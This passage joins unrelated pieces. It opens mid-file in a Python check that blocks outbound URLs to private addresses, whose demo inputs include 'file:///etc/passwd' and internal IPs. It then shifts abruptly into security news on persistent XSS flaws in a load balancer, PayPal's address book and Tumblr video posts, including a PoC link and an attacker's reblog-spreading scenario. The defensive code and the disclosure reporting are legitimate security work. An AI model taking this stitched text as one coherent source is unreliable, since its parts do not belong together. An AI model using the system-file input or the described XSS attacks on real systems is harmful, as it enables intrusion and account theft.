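        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def check_outbound_url(url, resolve):
    """Return (ok, reason).  `resolve(host)` returns every IP the host maps
    to; all of them must be public, since the client may connect to any."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % scheme
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, "port %d not allowed" % port
    addrs = [host] if _is_ip_literal(host) else resolve(host)
    if not addrs:
        return False, "host does not resolve"
    for ip_text in addrs:
        if not is_public_address(ip_text):
            return False, "%s -> %s is not a public address" % (host, ip_text)
    return True, "ok"


# Constructed DNS data for the offline demo.
FAKE_DNS = {
    "www.example.test": ["93.184.216.34"],
    "admin.corp.example": ["10.20.30.40"],
    "dual.example.test": ["93.184.216.34", "192.168.1.5"],  # one public, one private
}


def fake_resolve(host):
    return FAKE_DNS.get(host.lower(), [])


if __name__ == "__main__":
    for url in ["http://www.example.test/", "http://admin.corp.example/",
                "http://127.0.0.1/", "http://[::ffff:10.0.0.1]/", "file:///etc/passwd"]:
        print(url, check_outbound_url(url, fake_resolve))
```

Two caveats for anyone wiring this in: connect to the address that was vetted (passing the hostname separately for the Host header) rather than resolving again at connect time, otherwise a DNS answer that changes between the check and the connection bypasses it; and re-run the check on every redirect target, since a public host can redirect to an internal one.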

Multiple vulnerabilities in Enterpriser16 LoadBalancer v7.1

Vulnerability-Lab researchers have found multiple persistent input validation web vulnerabilities in the Enterpriser16 v7.1 Load Balancer application.

The first set of vulnerabilities is located in the `Edit Configuration` module, in the Label, Virtual Host, Request to send, Email Alerts and Response expected parameters.

The second set is located in the Create Solution, Access points and New Contract modules, in the title, asset name, contract name, name and description parameters.

Exploitation requires low user interaction and a low-privileged application user account. Successful exploitation can lead to persistent session hijacking (manager/admin), persistent phishing or persistent manipulation of the module's web context.

A detailed proof-of-concept can be found here.

Vulnerability Lab discovered persistent XSS vulnerability in PayPal

The Vulnerability Laboratory Research Team discovered a persistent web vulnerability in the official PayPal (core) e-commerce website content management system.

The flaw allows remote attackers to inject their own malicious script code on the application side (persistent).

The persistent input validation vulnerability is located in the search function of the Adressbuch (address book) module, which processes contact names containing script code tags. The code is executed from the search result listing web context. Remote exploitation requires low user interaction and a privileged PayPal banking application user account.

Successful exploitation results in persistent session hijacking (admin), account theft via persistent phishing or persistent manipulation of the search module's web context.

In an email sent to EHN, Vulnerability Lab submitted a proof-of-concept for the flaw. The PoC code is available here: http://pastebin.com/LhB82k4F

A contact name containing the code is saved in the address book. When another user searches the address book and that contact appears in the matching results, the code executes persistently from the search result listing.

A few months after Vulnerability Lab notified PayPal, the PayPal security team patched the vulnerability on December 11.

Stored XSS vulnerability in Tumblr can be used for Phishing and Malware attack

Recently we reported that the reason behind the Tumblr reblog attack is a stored cross-site scripting (XSS) vulnerability. The vulnerability was discovered by security researcher Janne Ahlberg, who says it is not yet fixed.

According to his research, it is possible to embed JavaScript and some other HTML tags in certain Tumblr post types (e.g. video posts).

The vulnerability can be used for phishing attacks. For instance, it would be quite easy to ask the user for input in various ways and store that input on the attacker's server. The attacker could also push malicious files from his or her server to Tumblr users.

"Attacker could create several Tumblr accounts and start blogging viral or popular videos using well chosen tags. Trust and popularity could be increased by using other accounts for reblogging video posts," the researcher said, describing one possible attack scenario.

"Once the 'attack blog' would have enough followers, attacker could create a malicious post again with carefully selected tags. If the followers would reblog a malicious post, the spreading of payload would start."